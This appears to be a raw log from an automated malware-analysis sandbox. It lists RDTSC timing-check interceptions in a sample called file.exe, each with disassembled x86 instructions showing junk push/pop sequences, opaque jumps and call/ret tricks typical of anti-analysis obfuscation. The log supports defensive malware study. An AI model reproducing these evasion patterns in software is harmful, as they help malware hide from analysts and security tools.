Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C4BD second address: C5C4DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C4DA second address: C5C4EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C4EA second address: C5C4FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F18DC15CEh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C4FD second address: C5C517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F1851F5E6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C517 second address: C40271 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1F18DC15C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F1F18DC15C8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov edx, dword ptr [ebp+122D1AA3h] 0x0000002d mov cx, di 0x00000030 lea eax, dword ptr [ebp+1248C226h] 0x00000036 mov dword ptr [ebp+122D1986h], esi 0x0000003c nop 0x0000003d jnp 00007F1F18DC15DFh 0x00000043 jmp 00007F1F18DC15D9h 0x00000048 push eax 0x00000049 push eax 0x0000004a push esi 0x0000004b jmp 00007F1F18DC15CBh 0x00000050 pop esi 0x00000051 pop eax 0x00000052 nop 0x00000053 xor dword ptr [ebp+122D1FB2h], edi 0x00000059 add dh, 00000027h 0x0000005c call dword ptr [ebp+1245CB78h] 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 jmp 00007F1F18DC15D8h 0x0000006a pushad 0x0000006b popad 0x0000006c js 00007F1F18DC15C6h 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C6F2 second address: C5C6F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C6F6 second address: C5C6FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5CDAC second address: C5CDB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5CDB2 second address: C5CDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5CDB6 second address: C5CDEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F1F1851F5E6h 0x00000011 jmp 00007F1F1851F5E1h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5CDEA second address: C5CE03 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1F18DC15CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D065 second address: C5D08D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1F1851F5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F1F1851F5E7h 0x00000010 popad 0x00000011 push eax 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D08D second address: C5D0BC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1F18DC15C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c mov edx, dword ptr [ebp+122D39DDh] 0x00000012 push 00000004h 0x00000014 mov edx, dword ptr [ebp+122D3979h] 0x0000001a nop 0x0000001b jmp 00007F1F18DC15CFh 0x00000020 push eax 0x00000021 push ebx 0x00000022 push esi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D596 second address: C5D59F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D59F second address: C5D5B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jno 00007F1F18DC15CCh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D5B7 second address: C5D5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D760 second address: C5D766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D766 second address: C5D76A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D76A second address: C5D76E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1967 second address: CA1985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F1F1851F5E8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1C47 second address: CA1C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1C4D second address: CA1C63 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1F1851F5D6h 0x00000008 ja 00007F1F1851F5D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ebx 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1C63 second address: CA1C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1F50 second address: CA1F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 jmp 00007F1F1851F5DAh 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jmp 00007F1F1851F5E7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1F7D second address: CA1F93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F18DC15D2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA212C second address: CA2130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA3E20 second address: CA3E24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA9F33 second address: CA9F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C13A55 second address: C13A70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F1F18DC15D2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C13A66 second address: C13A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F1F1851F5D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CADF41 second address: CADF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1F18DC15CAh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CADF54 second address: CADF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CADF58 second address: CADF8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F1F18DC15D7h 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CADF8D second address: CADF91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CADF91 second address: CADF97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CADF97 second address: CADF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CADF9D second address: CADFB7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1F18DC15DCh 0x00000008 jmp 00007F1F18DC15D0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CADFB7 second address: CADFC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAE0CF second address: CAE0D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAE0D8 second address: CAE0E4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAE0E4 second address: CAE0EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1F18DC15C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAFA99 second address: CAFAC0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1F1851F5D6h 0x00000008 je 00007F1F1851F5D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F1F1851F5E4h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB3704 second address: CB3729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F18DC15D7h 0x00000009 pop ecx 0x0000000a push esi 0x0000000b jp 00007F1F18DC15C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB2EE3 second address: CB2F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F1851F5DFh 0x00000009 jnl 00007F1F1851F5D6h 0x0000000f jmp 00007F1F1851F5E3h 0x00000014 popad 0x00000015 jp 00007F1F1851F5DCh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB2F1C second address: CB2F46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1F18DC15D2h 0x00000008 jmp 00007F1F18DC15D0h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBC34C second address: CBC350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBC350 second address: CBC35C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F1F18DC15C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBC35C second address: CBC386 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F1F1851F5E5h 0x0000000a pop esi 0x0000000b pushad 0x0000000c jno 00007F1F1851F5D6h 0x00000012 js 00007F1F1851F5D6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBC4C8 second address: CBC4E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F1F18DC15C6h 0x00000009 jmp 00007F1F18DC15D4h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBC4E7 second address: CBC4ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBC4ED second address: CBC501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jl 00007F1F18DC15C6h 0x0000000c pop esi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBC501 second address: CBC50E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 ja 00007F1F1851F5D6h 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBC67E second address: CBC695 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1F18DC15D9h 0x00000008 jmp 00007F1F18DC15CDh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBC824 second address: CBC82A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBC96F second address: CBC986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F18DC15D1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBCB2A second address: CBCB36 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1F1851F5DEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D288 second address: C5D28C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D28C second address: C5D2E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 mov cl, 38h 0x0000000a push 00000004h 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F1F1851F5D8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 nop 0x00000027 push edi 0x00000028 jo 00007F1F1851F5E1h 0x0000002e jmp 00007F1F1851F5DBh 0x00000033 pop edi 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F1F1851F5E5h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBCCA5 second address: CBCCAF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1F18DC15C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBCCAF second address: CBCCB4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC4F80 second address: CC4F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC3054 second address: CC305D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC305D second address: CC3061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC332F second address: CC3334 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC3334 second address: CC333A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC333A second address: CC3348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC3348 second address: CC334C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC334C second address: CC3363 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1F1851F5DBh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC3363 second address: CC3383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1F18DC15D0h 0x0000000f jl 00007F1F18DC15C6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC3383 second address: CC3387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC3387 second address: CC33A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F1F18DC15D7h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC36CB second address: CC36DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC36DA second address: CC36E6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1F18DC15C6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC36E6 second address: CC3712 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop esi 0x0000000e jg 00007F1F1851F5E8h 0x00000014 jmp 00007F1F1851F5DCh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC3C83 second address: CC3C88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC41EE second address: CC41F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC41F4 second address: CC41F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC4797 second address: CC47A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F1F1851F5D6h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8E8B second address: CC8EA1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F1F18DC15C6h 0x00000010 je 00007F1F18DC15C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC914C second address: CC9150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC9150 second address: CC9158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC92AC second address: CC92B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC92B2 second address: CC92B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC92B6 second address: CC92BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC92BA second address: CC9301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1F18DC15D3h 0x0000000c jmp 00007F1F18DC15D1h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jmp 00007F1F18DC15D5h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC9301 second address: CC930C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD02B9 second address: CD02BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD02BD second address: CD02D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD66E5 second address: CD6700 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15CBh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F1F18DC15CEh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD69B1 second address: CD69B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD6B06 second address: CD6B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD6B0A second address: CD6B26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F1F1851F5D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F1F1851F5DAh 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD6B26 second address: CD6B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 jnp 00007F1F18DC15C6h 0x0000000c pop ebx 0x0000000d rdtsc
